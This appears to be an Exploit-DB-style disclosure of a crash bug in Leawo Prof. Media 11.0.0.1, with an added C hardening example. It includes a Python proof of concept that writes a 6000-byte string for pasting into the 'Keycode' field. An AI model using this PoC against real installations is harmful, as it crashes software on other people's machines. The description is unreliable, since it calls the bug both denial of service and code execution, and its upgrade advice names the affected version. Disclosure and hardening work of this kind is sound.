Vendor: Prof. Media
By: Achilles
CVSS: 7.5 (HIGH)
Type: Denial of Service (DoS)
CWE: 119
Product Name: Prof. Media
Affected Version From: 11.0.0.1
Affected Version To: 11.0.0.1
Patch Exists: YES
Related CWE: N/A
CPE: a:leawo:prof._media:11.0.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 x64
2021

Leawo Prof. Media 11.0.0.1 – Denial of Service (DoS) (PoC)

A vulnerability in Leawo Prof. Media 11.0.0.1 could allow an attacker to cause a denial of service (DoS) condition. The vulnerability exists due to a boundary error when processing user-supplied input. A remote attacker can create a specially crafted file, trick the victim into opening it, and execute arbitrary code on the system. Successful exploitation of this vulnerability could result in a denial of service condition.

Mitigation:

Upgrade to the latest version of Leawo Prof. Media 11.0.0.1 or apply the appropriate patch.
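
The boundary error described above (CWE-119) is the class of bug in which a pasted string is copied into a fixed-size buffer without a length check. The C sketch below is an added example, not code from the vendor or from the original page: the function names, the 64-character limit and the allowed character set are assumptions made for illustration. It contrasts the unsafe copy with a handler that rejects oversized input such as the 6000-byte string used in the PoC.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define KEYCODE_MAX 64  /* assumed maximum key length; not taken from the product */

enum key_status { KEY_OK = 0, KEY_EMPTY, KEY_TOO_LONG, KEY_BAD_CHAR };

/* Unsafe pattern (CWE-119): copies until the NUL terminator regardless of
 * the destination size. Shown for contrast only; it is never called. */
void store_keycode_unsafe(char *dst, const char *input) {
    strcpy(dst, input);
}

/* Hardened form: measure first, reject instead of truncating, then copy. */
enum key_status store_keycode(char *dst, size_t dst_size, const char *input) {
    if (dst == NULL || dst_size == 0 || input == NULL)
        return KEY_EMPTY;
    /* Look for the terminator within the first dst_size bytes only. */
    const char *end = memchr(input, '\0', dst_size);
    if (end == NULL)
        return KEY_TOO_LONG;            /* input plus terminator does not fit */
    size_t len = (size_t)(end - input);
    if (len == 0)
        return KEY_EMPTY;
    /* Assumed key alphabet: letters, digits and '-' separators. */
    for (size_t i = 0; i < len; i++)
        if (!isalnum((unsigned char)input[i]) && input[i] != '-')
            return KEY_BAD_CHAR;
    memcpy(dst, input, len + 1);        /* len + 1 <= dst_size is guaranteed */
    return KEY_OK;
}

int main(void) {
    static char pasted[6001];           /* constructed input: 6000 x 'A' */
    char field[KEYCODE_MAX + 1] = "";
    memset(pasted, 'A', 6000);          /* static storage keeps the final NUL */
    printf("6000-byte input -> status %d\n",
           store_keycode(field, sizeof field, pasted));
    printf("sample key      -> status %d\n",
           store_keycode(field, sizeof field, "ABCD-1234-EFGH"));
    return 0;
}
```

Rejecting the input outright, rather than truncating it, leaves the destination buffer untouched and gives the caller a status it can log or show to the user.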

Exploit-DB raw data:

# Exploit Title: Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)
# Date: 25.07.2021
# Vendor Homepage: https://www.leawo.org
# Software Link: https://www.leawo.org/downloads/total-media-converter-ultimate.html
# Exploit Author: Achilles
# Tested Version: 11.0.0.1
# Tested on: Windows 7 x64


# 1.- Run the Python code:
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Leawo Prof. Media
# 4.- Click Activation Center
# 5.- Paste the content of EVIL.txt into the Field: 'Keycode'
# 6.- Click 'Register' and you will see a crash.

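#!/usr/bin/env python
# Build a 6000-byte string of "A" (0x41) characters
buffer = "\x41" * 6000

try:
    # Write the string to a text file for pasting into the 'Keycode' field
    with open("Evil.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except IOError:
    print("File cannot be created")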